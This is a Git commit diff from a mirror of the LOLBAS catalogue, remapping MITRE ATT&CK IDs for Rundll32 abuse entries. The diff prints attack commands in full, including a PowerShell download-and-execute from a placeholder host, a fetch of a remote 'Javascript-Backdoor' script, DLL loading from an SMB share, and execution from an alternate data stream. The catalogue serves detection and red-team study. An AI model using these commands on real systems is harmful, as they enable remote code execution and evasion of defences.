public-mirrors/LOLBAS
1
0
Fork 0
mirror of https://github.com/LOLBAS-Project/LOLBAS synced 2025-07-27 04:32:24 +02:00
Code Issues Projects Releases Wiki Activity

MITRE ATT&CK realignment sprint

Browse Source
This commit is contained in:
Wietze
2021-11-05 18:58:26 +00:00
committed by GitHub
parent 97f5042a58
commit 4f7ec8d2af
159 changed files with 190 additions and 506 deletions
Download Patch File Download Diff File Expand all files Collapse all files

24
yml/OSBinaries/Rundll32.yml
View File

@@ -9,64 +9,56 @@ Commands:
Usecase: Execute dll file
Category: Execute
Privileges: User
MitreID: T1085
MitreLink: https://attack.mitre.org/wiki/Technique/T1085
MitreID: T1218.011
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
- Command: rundll32.exe \\10.10.10.10\share\payload.dll,EntryPoint
Description: Use Rundll32.exe to execute a DLL from a SMB share. EntryPoint is the name of the entry point in the .DLL file to execute.
Usecase: Execute DLL from SMB share.
Category: Execute
Privileges: User
MitreID: T1085
MitreLink: https://attack.mitre.org/techniques/T1085
MitreID: T1218.011
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
- Command: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();new%20ActiveXObject("WScript.Shell").Run("powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('http://ip:port/');"
Description: Use Rundll32.exe to execute a JavaScript script that runs a PowerShell script that is downloaded from a remote web site.
Usecase: Execute code from Internet
Category: Execute
Privileges: User
MitreID: T1085
MitreLink: https://attack.mitre.org/wiki/Technique/T1085
MitreID: T1218.011
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
- Command: rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";eval("w=new%20ActiveXObject(\"WScript.Shell\");w.run(\"calc\");window.close()");
Description: Use Rundll32.exe to execute a JavaScript script that runs calc.exe.
Usecase: Proxy execution
Category: Execute
Privileges: User
MitreID: T1085
MitreLink: https://attack.mitre.org/wiki/Technique/T1085
MitreID: T1218.011
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
- Command: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WScript.Shell").run("calc.exe",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe",0,true);}
Description: Use Rundll32.exe to execute a JavaScript script that runs calc.exe and then kills the Rundll32.exe process that was started.
Usecase: Proxy execution
Category: Execute
Privileges: User
MitreID: T1085
MitreLink: https://attack.mitre.org/wiki/Technique/T1085
MitreID: T1218.011
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
- Command: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https://raw.githubusercontent.com/3gstudent/Javascript-Backdoor/master/test")
Description: Use Rundll32.exe to execute a JavaScript script that calls a remote JavaScript script.
Usecase: Execute code from Internet
Category: Execute
Privileges: User
MitreID: T1085
MitreLink: https://attack.mitre.org/wiki/Technique/T1085
MitreID: T1218.011
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
- Command: rundll32 "C:\ads\file.txt:ADSDLL.dll",DllMain
Description: Use Rundll32.exe to execute a .DLL file stored in an Alternate Data Stream (ADS).
Usecase: Execute code from alternate data stream
Category: ADS
Privileges: User
MitreID: T1096
MitreLink: https://attack.mitre.org/wiki/Technique/T1096
MitreID: T1564.004
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
- Command: rundll32.exe -sta {CLSID}
Description: Use Rundll32.exe to load a registered or hijacked COM Server payload. Also works with ProgID.
Usecase: Execute a DLL/EXE COM server payload or ScriptletURL code.
Category: Execute
Privileges: User
MitreID:
MitreLink:
MitreID: T1218.011
OperatingSystem: Windows 10 (and likely previous versions)
Full_Path:
- Path: C:\Windows\System32\rundll32.exe